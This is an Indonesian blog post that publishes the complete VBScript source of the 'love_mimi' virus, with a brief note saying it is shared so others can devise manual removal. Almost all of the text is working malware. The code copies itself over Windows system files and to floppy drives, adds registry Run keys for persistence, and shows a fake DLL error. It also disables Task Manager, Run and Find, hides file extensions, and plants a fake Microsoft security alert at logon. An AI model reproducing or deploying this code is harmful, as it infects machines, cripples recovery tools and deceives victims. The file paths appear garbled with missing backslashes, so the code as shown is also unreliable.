Source Code virus love_mimi
Nampaknya saya gak sempat dan tidak akan sempat membuat analisis virus bandel yang satu ini. tapi saya harap dengan memposting source code ini ada diantara teman2 yang mau membuat cara manual removalnya. dengan source code ini anda bisa melihat langsung badan virus dan apa saja yang dilakukannya. sehingga dapat melakukan pembersihan manual.
wassalam
--------------------------------[mulai]-----------------------
Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))
Set dear = createobject(StrReverse("llehS.tpircSW"))
qi = "c:regedit.vbs"
syau = "c:mymimi.vbs"
heiji = "c:notepad.vbs"
forest = "c:antivirus.vbs"
han = "c:windowssvchost.exe"
tachoor = "c:windowsEXPL0RER.vbs"
mimi = "c:windowssystemWinUpdt.vbs"
on error resume next
love.CopyFile wscript.scriptfullname, tachoor
on error resume next
love.CopyFile wscript.scriptfullname, mimi
on error resume next
iqra = dear.regread("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKernell32")
If iqra <> "c:windowssvchost.exe " & tachoor then
on error resume next
dear.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows ScriptingHostSettingsTimeout", 0, "REG_DWORD"
dear.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKernell32", "c:windowssvchost.exe " & tachoor
dear.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunAVGuard32", "c:windowssvchost.exe " & mimi
dear.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunPCMAVscanner", "c:windowssvchost.exe " & syau
done = MsgBox("The application or DLL C:WINDOWSsystem32MSVBVM60.DLL is not a valid Windows image. Please check this againts your installation diskette.", 16, "msvbvm60.dll - Bad Image")
dear.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesSVCH0ST", "c:windowssvchost.exe " & mimi
love.CopyFile wscript.scriptfullname, "A:diary_rahmi.vbe"
on error resume next
love.CopyFile wscript.scriptfullname, tachoor
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSmsvbvm60.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm60.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm50.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msihnd.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvnvvm60.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSTASKMAN.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSNOTEPAD.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSR.com"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSREGEDIT.com"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSregedit.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32nusrmgr.cpl"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32cmd.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32control.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msiexec.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32regedt32.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32taskman.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32taskmgr.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32command.com"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32T.com"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32TASKMGR.com"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32Restorerstrui.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32Restoresrdiag.exe"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32Restoresrframe.mmf"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32Restorerstrlog.dat"
on error resume next
cdrsqnx()
dwozmc()
ontrus()
else
on error resume next
love.CopyFile wscript.scriptfullname, "A:diary_mimi.vbs"
on error resume next
love.CopyFile wscript.scriptfullname, tachoor
on error resume next
love.CopyFile wscript.scriptfullname, "C:Documents and SettingsAll UsersStart MenuProgramsStartupPCMAVExtMonitor.vbs"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm60.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm50.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSmsvbvm60.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm60.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvnvvm60.dll"
on error resume next
love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32nusrmgr.cpl"
on error resume next
hcdmshsx()
cdrsqnx()
dwozmc()
ontrus()
End if
Sub hcdmshsx()
Dim married
on error resume next
married = "<html><head><title>bandit corporation</title><b><center><h1><font color=" & chr(34) & "#FF0000" & chr(34) & " size=" & chr(34) & "10" & chr(34) & " face=Verdana><br>my_mimi </font><font size=" & chr(34) & "8" & chr(34) & " color=" & chr(34) & "#FF2244" & chr(34) & ">♥ </font><hr align=center width=" & chr(34) & "40%" & chr(34) & " size=" & chr(34) & "2" & chr(34) & "></font></h1></head>" & "<body bgcolor=" & chr(34) & "#000000" & chr(34) & "><body><b><center><font color=" & chr(34) & "#FF0000" & chr(34) & " size=" & chr(34) & "4" & chr(34) & " face=verdana></p><p><p><b><p><b><p><br><p>muka bego!! ngapain mandangin kompie ini trus2an!? cari dong anti virusnya!!<br><br><br><a href=" & chr(34) & "http://friendster.com/sywq" & chr(34) & ">klik di sini!</a></font></p><p></p><p></p><p></p><p><center><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><hr align=center width=" & chr(34) & "100%" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "><marquee><font color=" & chr(34) & "#00FF00" & chr(34) & " size=" & chr(34) & "4" & chr(34) & " face=Verdana></font><font size=" & chr(34) & "4" & chr(34) & " color=" & chr(34) & "#FF0000" & chr(34) & ">♣ ♠ ♦ ♥ </font><font color=" & chr(34) & "#FFFFFF" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "face=Verdana> Pada komputer ini bersarang virus my_mimi</font><font size=" & chr(34) & "4" & chr(34) & " color=" & chr(34) & "#FF0000" & chr(34) & "> ♣ ♠ ♦ ♥ </font><font color=" & chr(34) & "#FFFFFF" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "face=Verdana> Komputer iko kanai virus my_mimi</font><font size=" & chr(34) & "4" & chr(34) & " color=" & chr(34) & "#FF0000" & chr(34) & "> ♣ ♠ ♦ ♥ </font><font color=" & chr(34) & "#FFFFFF" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "face=Verdana> This computer is a victim of virus my_mimi</font><font size=" & chr(34) & "4" & chr(34) & " color=" & chr(34) & "#FF0000" & chr(34) & "> ♣ ♠ ♦ ♥ </font><font color=" & chr(34) & "#00FF00" & chr(34) & " size=" & chr(34) & "4" & chr(34) & " face=Verdana>with love, mr.han</font></marquee><hr align=center width=" & chr(34) & "100%" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "></center></html>"
Set hateness = love.createtextfile("C:windowsmy_mimi.html",1)
hateness.Write married
Set hateness = love.createtextfile("C:Documents and SettingsAll UsersDesktopmimi on internet.html",1)
hateness.Write married
hateness.Close
on error resume next
Set broken = love.createtextfile("C:Documents and SettingsAll UsersStart MenuProgramsStartupsywq.ini", 1)
broken.WriteLine "::::::,.....:;.,,,,,..,...,,,::,,,,:::::::::;:;;;;;;;rrrrrr;;;;;;r@@@AS2AMHG3hrsy@" & vbCrlf & ":,....,,.....;,,.. ... ..:,,:::::::::::;;;;;;;;rrrrsr;;;;;;;:s@@@92322@@@;wQ@" & vbCrlf & "..,,,,,,,,,..,, .;r3HAH@@@G5:....,:::::::;;;s;;;;;;rrrrrssrr;;;r;;,X@X5XXXHMB@3201" & vbCrlf & ",,,,,,,,,,,. .i&@@@@@@@@@@@@@@9Sr,.;::::;;;:s;;;;;rrrr;;:;;;;;:;;;::G22X3H@2sAMB3," & vbCrlf & ",,,,,,,,,,. r@@@@@@@@@@@@###@@@@@#Sr;::;;;;:rr;rrs;;::::::,,:rGB2r:,r23&B@M2r#@@@h" & vbCrlf & ",,,,,,,,,..&@@@@@@@@@@#AX5525S5h@@@5::;;;;;;rr;;;:::::,,.:sG@@@@@@HSs2XA##A9rB@@@B" & vbCrlf & ",,,,,,,,.:@@@@@###AAA95iSS522XB@M5SA;:;rrr;;;::::,,,..:iA@@@@@@@@@@@ASX3HHA&r3&G&H" & vbCrlf & ",,,,,,,.:@@@@@##Mh225XGM##H&GSX##AS5s:;rr;:::,,,...:5M@@@@@@####@@@@@323AAHAr2HA&&" & vbCrlf & ",,,,,,,.A@@@####B35XH#####MA92i2#@@Br,..,::::,.,;X#@@@@@##MMMMMM####@@AhhhBAsX#BBA" & vbCrlf & ",,,,,,.5@@##M##@#92&AhhH#@#A922sr5srSs;...,,:;H@@@@@@#MBBBBBMMMBHHB##3s2AGMHi5&HMA" & vbCrlf & ",,,,,,;@@#MBM##@@XiX9B#@@BA9X253HBB@#2s;.....,rh@@@@##MMMMMMBBHHAA2: rHMHi2GXGA" & vbCrlf & ";,,,,.s@@#MM###@#5s2AAX5552XhGX@@@BAXSir;.... ;h@@@###MBBHH&hS, A#B59B3X3" & vbCrlf & ";:,:, s@@MB#####hsiSissiS2223&AAh3X&&X93S; ... ,2#@#MBBHG3Xii.,, H@B2G#A&h" & vbCrlf & ":;::,..M@MBB##@HSrsssiS222XX32222&####MH&X...... .iB@#h2Sii53X:r: M@BX&#HAG" & vbCrlf & "::;::, ;@#MMM#@#2rsSiS222XXX3X9A#@HAHM@#G&; .,,.... rGA35522X&X:r: ##B&HBBH&" & vbCrlf & "::;;:,. S@#MM#@@H5iSSS522XX339&MMGhB##@@M&;,:..,,.... ;hMAX52XAX:r; ##B&HAHBA" & vbCrlf & ":::;:::. 2B93AMMH&255SS2XX3939G&G&BMBH&hX2,.;;:......... :XMHX2XA9;;,,##BHMHAMA" & vbCrlf & ":;;;;::. s#5XGHX2iS55552X9hhG&ABBHA&&ABBB; .,:;,...,,,... .iBM&XGAr,r##BMAsHMH" & vbCrlf & "rr;::,,,. XAA#AGGSsS222X39G&&AAA&hh&B##@@: ...,:;,..,,,,,... rA#H&X,;##B#& rMA" & vbCrlf & "::,,,,,,,. ,shA5235sS22X3h&AAAAA&&HM#@@@9 .....,:;,..,,,,.,. :9##Xi##B#@r.2G" & vbCrlf & ":::,,,,,,.. :X@@3rri2X339G&AHM##@@@@@#Xr .....,,::,..,,..... ,5MAM#M#@@@@&" & vbCrlf & ":,,,,,,,,... ;B@M2s29GAAHM#@@@@@@###MHHi .......,::,......... r##M@@#@@@" & vbCrlf & ",,,,,,,,...... ,iSS9&AAAAAHHHHHA&GGGAAMs ..::, ...... .:3MMB#@#BHM" & vbCrlf & ",,,,,,.......... ,29999939h&AA&&AB#@@@@3:,.. .,. .. ,@@@#BB#@@AAH" & vbCrlf & ",,,,,,,...,....... s23GAB##########@@@@@@@@@@@@BhSr:,,. ,M@@@@@@#B#@@HGA" & vbCrlf & ",,,,,,,,,.,,.. ,:;&##@@###MMMM#MMBBM###@@@@@@@@@@@@@@@@H2H@@@@@@@@@@#@@#GA" & vbCrlf & ",,,,,,,,,,. ,;rsiSh#@@@@@@#####MMM#######MBHAH#@#BMMB25hBM#@@@@@@@@#@@@@@@@@@@AA" & vbCrlf & ",,,,,,,.. :X@@@@@@@@@@@@@@####MMMM#######MMMMB&M@@@###HX3XX995hHAAA&&#@@@@@@@@@MA" & vbCrlf & ",,,,,,,. ;B@@@@@@@@@@@##M##########MH&923&BHH#@HHM#@@@MB##952A3X&Hi2hB#@@@@#@@@@@B" & vbCrlf & ",,,,,,,.9@@@@#@@##@@@@#MM########@@MB##MBM#@@@@@#h2SA#@#H;sX33&hXAX392&AM#A2B@@@@@" & vbCrlf & ",,,,,,.2@@BM#MM#@##@@@@#B#@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@ASG9h&Xh9hSA23X32S3&#@@@@" & vbCrlf & ",,,,,.:@@AB##M####@@@@@@#M#@@@@@#@@@@@@@@@@@@@@@@@#@@@@@@@@@2i5iX5s2G355X2GG2iG@@#" & vbCrlf & ",,,,,.&@BMBBM#M#@#@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@B#MA9G#M##MBA#MX2#@" & vbCrlf & "::,,.;@#M#HH###M#@@@@@@@@@##@@@##@@#@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@BM@" & vbCrlf & ".... ;BHHBHHMM##M##@@@@@@@@######@@@@@@@@@############@@@@@@@@@###################" & vbCrlf & "" & vbCrlf & "mimi..." & vbCrlf & "lo emang my_mimi!!" & vbCrlf & "" & vbCrlf & "however you are,," & vbCrlf & "IjustWANNAbeWITHu.." & vbCrlf & " " & vbCrlf & "[credits]" & vbCrlf & " " & vbCrlf & "mr.han (d_janer'z crew!)" & vbCrlf & "haecal (d_janer'z crew!)" & vbCrlf & "rendi (d_janer'z crew!)" & vbCrlf & "siwa (d_janer'z crew!)"& vbCrlf & "kharisma (phatigokil)" & vbCrlf & "all d_janer'z crew!!! smansa padang"
Set broken = love.createtextfile("C:Documents and SettingsAll UsersDesktopmy beLoved mimi.ini", 1)
broken.WriteLine "::::::,.....:;.,,,,,..,...,,,::,,,,:::::::::;:;;;;;;;rrrrrr;;;;;;r@@@AS2AMHG3hrsy@" & vbCrlf & ":,....,,.....;,,.. ... ..:,,:::::::::::;;;;;;;;rrrrsr;;;;;;;:s@@@92322@@@;wQ@" & vbCrlf & "..,,,,,,,,,..,, .;r3HAH@@@G5:....,:::::::;;;s;;;;;;rrrrrssrr;;;r;;,X@X5XXXHMB@3201" & vbCrlf & ",,,,,,,,,,,. .i&@@@@@@@@@@@@@@9Sr,.;::::;;;:s;;;;;rrrr;;:;;;;;:;;;::G22X3H@2sAMB3," & vbCrlf & ",,,,,,,,,,. r@@@@@@@@@@@@###@@@@@#Sr;::;;;;:rr;rrs;;::::::,,:rGB2r:,r23&B@M2r#@@@h" & vbCrlf & ",,,,,,,,,..&@@@@@@@@@@#AX5525S5h@@@5::;;;;;;rr;;;:::::,,.:sG@@@@@@HSs2XA##A9rB@@@B" & vbCrlf & ",,,,,,,,.:@@@@@###AAA95iSS522XB@M5SA;:;rrr;;;::::,,,..:iA@@@@@@@@@@@ASX3HHA&r3&G&H" & vbCrlf & ",,,,,,,.:@@@@@##Mh225XGM##H&GSX##AS5s:;rr;:::,,,...:5M@@@@@@####@@@@@323AAHAr2HA&&" & vbCrlf & ",,,,,,,.A@@@####B35XH#####MA92i2#@@Br,..,::::,.,;X#@@@@@##MMMMMM####@@AhhhBAsX#BBA" & vbCrlf & ",,,,,,.5@@##M##@#92&AhhH#@#A922sr5srSs;...,,:;H@@@@@@#MBBBBBMMMBHHB##3s2AGMHi5&HMA" & vbCrlf & ",,,,,,;@@#MBM##@@XiX9B#@@BA9X253HBB@#2s;.....,rh@@@@##MMMMMMBBHHAA2: rHMHi2GXGA" & vbCrlf & ";,,,,.s@@#MM###@#5s2AAX5552XhGX@@@BAXSir;.... ;h@@@###MBBHH&hS, A#B59B3X3" & vbCrlf & ";:,:, s@@MB#####hsiSissiS2223&AAh3X&&X93S; ... ,2#@#MBBHG3Xii.,, H@B2G#A&h" & vbCrlf & ":;::,..M@MBB##@HSrsssiS222XX32222&####MH&X...... .iB@#h2Sii53X:r: M@BX&#HAG" & vbCrlf & "::;::, ;@#MMM#@#2rsSiS222XXX3X9A#@HAHM@#G&; .,,.... rGA35522X&X:r: ##B&HBBH&" & vbCrlf & "::;;:,. S@#MM#@@H5iSSS522XX339&MMGhB##@@M&;,:..,,.... ;hMAX52XAX:r; ##B&HAHBA" & vbCrlf & ":::;:::. 2B93AMMH&255SS2XX3939G&G&BMBH&hX2,.;;:......... :XMHX2XA9;;,,##BHMHAMA" & vbCrlf & ":;;;;::. s#5XGHX2iS55552X9hhG&ABBHA&&ABBB; .,:;,...,,,... .iBM&XGAr,r##BMAsHMH" & vbCrlf & "rr;::,,,. XAA#AGGSsS222X39G&&AAA&hh&B##@@: ...,:;,..,,,,,... rA#H&X,;##B#& rMA" & vbCrlf & "::,,,,,,,. ,shA5235sS22X3h&AAAAA&&HM#@@@9 .....,:;,..,,,,.,. :9##Xi##B#@r.2G" & vbCrlf & ":::,,,,,,.. :X@@3rri2X339G&AHM##@@@@@#Xr .....,,::,..,,..... ,5MAM#M#@@@@&" & vbCrlf & ":,,,,,,,,... ;B@M2s29GAAHM#@@@@@@###MHHi .......,::,......... r##M@@#@@@" & vbCrlf & ",,,,,,,,...... ,iSS9&AAAAAHHHHHA&GGGAAMs ..::, ...... .:3MMB#@#BHM" & vbCrlf & ",,,,,,.......... ,29999939h&AA&&AB#@@@@3:,.. .,. .. ,@@@#BB#@@AAH" & vbCrlf & ",,,,,,,...,....... s23GAB##########@@@@@@@@@@@@BhSr:,,. ,M@@@@@@#B#@@HGA" & vbCrlf & ",,,,,,,,,.,,.. ,:;&##@@###MMMM#MMBBM###@@@@@@@@@@@@@@@@H2H@@@@@@@@@@#@@#GA" & vbCrlf & ",,,,,,,,,,. ,;rsiSh#@@@@@@#####MMM#######MBHAH#@#BMMB25hBM#@@@@@@@@#@@@@@@@@@@AA" & vbCrlf & ",,,,,,,.. :X@@@@@@@@@@@@@@####MMMM#######MMMMB&M@@@###HX3XX995hHAAA&&#@@@@@@@@@MA" & vbCrlf & ",,,,,,,. ;B@@@@@@@@@@@##M##########MH&923&BHH#@HHM#@@@MB##952A3X&Hi2hB#@@@@#@@@@@B" & vbCrlf & ",,,,,,,.9@@@@#@@##@@@@#MM########@@MB##MBM#@@@@@#h2SA#@#H;sX33&hXAX392&AM#A2B@@@@@" & vbCrlf & ",,,,,,.2@@BM#MM#@##@@@@#B#@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@ASG9h&Xh9hSA23X32S3&#@@@@" & vbCrlf & ",,,,,.:@@AB##M####@@@@@@#M#@@@@@#@@@@@@@@@@@@@@@@@#@@@@@@@@@2i5iX5s2G355X2GG2iG@@#" & vbCrlf & ",,,,,.&@BMBBM#M#@#@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@B#MA9G#M##MBA#MX2#@" & vbCrlf & "::,,.;@#M#HH###M#@@@@@@@@@##@@@##@@#@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@BM@" & vbCrlf & ".... ;BHHBHHMM##M##@@@@@@@@######@@@@@@@@@############@@@@@@@@@###################" & vbCrlf & "" & vbCrlf & "mimi..." & vbCrlf & "lo emang my_mimi!!" & vbCrlf & "" & vbCrlf & "however you are,," & vbCrlf & "IjustWANNAbeWITHu.." & vbCrlf & " " & vbCrlf & "[credits]" & vbCrlf & " " & vbCrlf & "mr.han (d_janer'z crew!)" & vbCrlf & "haecal (d_janer'z crew!)" & vbCrlf & "rendi (d_janer'z crew!)" & vbCrlf & "siwa (d_janer'z crew!)" & vbCrlf & "kharisma (phatigokil)" & vbCrlf & "all d_janer'z crew!!! smansa padang"
Set broken = love.createtextfile(qi, 1)
broken.WriteLine "MsgBox " & chr(34) & "Knp sih kamu buka regedit? Dah bosan ya jadi temen aku? Kamu tega banget!" & chr(34) & ", vbOKonly," & chr(34) & "my_mimi : (" & chr(34)
Set broken = love.createtextfile(heiji, 1)
broken.WriteLine "MsgBox " & chr(34) & "Kamu nyari notepad ya? Dia lagi pergi ma wordpad. Ada pesan?" & chr(34) & ", vbOKonly," & chr(34) & "my_mimi : P" & chr(34)
Set broken = love.createtextfile(forest, 1)
broken.WriteLine "MsgBox " & chr(34) & "Ngapain kamu make antivirus? Kamu pikir aku ini virus yg ngerusak kamu? Klo gitu biar aku cari teman lain aja!" & chr(34) & ", vbOKonly," & chr(34) & "my_mimi : (" & chr(34)
Set broken = love.createtextfile(syau, 1)
broken.WriteLine "MsgBox " & chr(34) & "hy, seneng deyh ketemuwh kamu lagi!" & chr(34) & ", vbOKonly," & chr(34) & "my_mimi ^_~" & chr(34)
broken.Close
End sub
Sub cdrsqnx()
On Error resume next
Set dear = createobject(StrReverse("llehS.tpircSW"))
with dear
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemlegalnoticetext", "Windows Security Center has been detected a new kind virus on your machine {codename: my_mimi}. This virus can causes your machine MELEDAK GITU LOH! Please tell Microsoft about this or use Microsoft Windows Automatic Update. For further information, contact us at : customercare@microsoft.com "
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemlegalnoticecaption", "Windows Security Center Alert"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerMainStart Page", "C:windowsmy_mimi.html"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerLogon User Name", "mimi"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogonAltDefaultUserName", "mimi"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogonDefaultUserName", "mimi"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopConvertedWallpaper", "C:windows my_mimi.html"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreenSaveActive", "1"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopSCRNSAVE.EXE", "C:WINDOWSsystem32marquee.scr"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeAttributes", "00011"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeBackgroundColor", "0 0 0"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeCharSet", "0"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeFont", "Verdana"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeMode", "1"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeSize", "24"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeSpeed", "3"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeText", "my_mimi by mr. han (d_janer'z crew!)"
.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeTextColor", "255 0 0"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerSearchHidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerSearchSystemDirs", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerThumbnailSize", 100, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemNoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives", 4, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesActiveDesktopNoChangingWallpaper", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerSearchHidden", 0, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden", 0, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerSearchSystemDirs", 0, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerThumbnailSize", 100, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemNoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderControlPanelInMyComputerCheckedValue", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderControlPanelInMyComputerUncheckedValue", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderControlPanelInMyComputerDefaultValue", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenCheckedValue", 0, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenUncheckedValue", 0, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenDefaultValue", 0, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenWarningIfNotDefault", "Ngapain sih main buka-bukaan? Ntar aku bilang mama kamu lho!"
.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHideFileExtCheckedValue", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHideFileExtUncheckedValue", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHideFileExtCheckedValue", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHideFileExtWarningIfNotDefault", "Hei! Knapa kamu mo liat rahasia aq? Wlaupun qt tmnan, aq ttp punya rahasia yg g blh kamu tau!"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerStartMenuStartPanelControlPanelHideCheckedValue", "1"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerStartMenuStartPanelControlPanelHideDefaultValue", "1"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionSystemFileProtectionShowPopup", 1, "REG_DWORD"
